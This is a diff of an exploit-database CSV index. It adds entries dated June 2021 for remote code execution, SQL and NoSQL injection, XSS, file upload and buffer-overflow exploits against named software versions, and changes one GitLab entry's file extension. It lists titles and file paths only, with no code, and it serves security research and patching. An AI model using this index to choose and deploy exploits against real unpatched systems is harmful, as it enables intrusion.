@@ -11350,6 +11351,7 @@ id,file,description,date,author,type,platform,port
 49900,exploits/windows/local/49900.txt,"ePowerSvc 6.0.3008.0 - 'ePowerSvc.exe' Unquoted Service Path",2021-05-24,"Emmanuel Lujan",local,windows,
 49925,exploits/windows/local/49925.txt,"Veyon 4.4.1 - 'VeyonService' Unquoted Service Path",2021-06-01,"Víctor García",local,windows,
 49929,exploits/windows/local/49929.txt,"Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path",2021-06-02,"Geovanni Ruiz",local,windows,
+49959,exploits/windows/local/49959.py,"IcoFX 2.6 - '.ico' Buffer Overflow SEH + DEP Bypass using JOP",2021-06-07,"Austin Babcock",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44027,7 +44029,7 @@ id,file,description,date,author,type,platform,port
 49817,exploits/php/webapps/49817.txt,"Voting System 1.0 - Time based SQLI  (Unauthenticated SQL injection)",2021-05-03,"Syed Sheeraz Ali",webapps,php,
 49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",2021-05-03,nu11secur1ty,webapps,php,
 49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",2021-05-03,4D0niiS,webapps,ruby,
-49822,exploits/ruby/webapps/49822.rb,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",2021-05-03,4D0niiS,webapps,ruby,
+49822,exploits/ruby/webapps/49822.txt,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",2021-05-03,4D0niiS,webapps,ruby,
 49823,exploits/php/webapps/49823.py,"Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)",2021-05-04,argenestel,webapps,php,
 49825,exploits/php/webapps/49825.txt,"Savsoft Quiz 5 - 'User Account Settings' Persistent Cross-Site Scripting",2021-05-05,strider,webapps,php,
 49826,exploits/multiple/webapps/49826.js,"Markdown Explorer 0.1.1 - XSS to RCE",2021-05-05,"Taurus Omar",webapps,multiple,
@@ -44113,3 +44115,8 @@ id,file,description,date,author,type,platform,port
 49945,exploits/php/webapps/49945.txt,"4Images 1.8 - 'redirect' Reflected XSS",2021-06-03,"Piyush Patil",webapps,php,
 49949,exploits/php/webapps/49949.py,"Monstra CMS 3.0.4 - Remote Code Execution (Authenticated)",2021-06-04,"Ron Jost",webapps,php,
 49951,exploits/ruby/webapps/49951.py,"Gitlab 13.10.2 - Remote Code Execution (Authenticated)",2021-06-04,enox,webapps,ruby,
+49955,exploits/hardware/webapps/49955.py,"OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated)",2021-06-07,SecNigma,webapps,hardware,
+49958,exploits/php/webapps/49958.txt,"WordPress Plugin Smart Slider-3 3.5.0.8 - 'name' Stored Cross-Site Scripting (XSS)",2021-06-07,"Hardik Solanki",webapps,php,
+49960,exploits/linux/webapps/49960.py,"Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated)",2021-06-07,enox,webapps,linux,
+49961,exploits/php/webapps/49961.py,"Grav CMS 1.7.10 - Server-Side Template Injection (SSTI) (Authenticated)",2021-06-07,enox,webapps,php,
+49962,exploits/php/webapps/49962.sh,"Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated)",2021-06-07,UnD3sc0n0c1d0,webapps,php,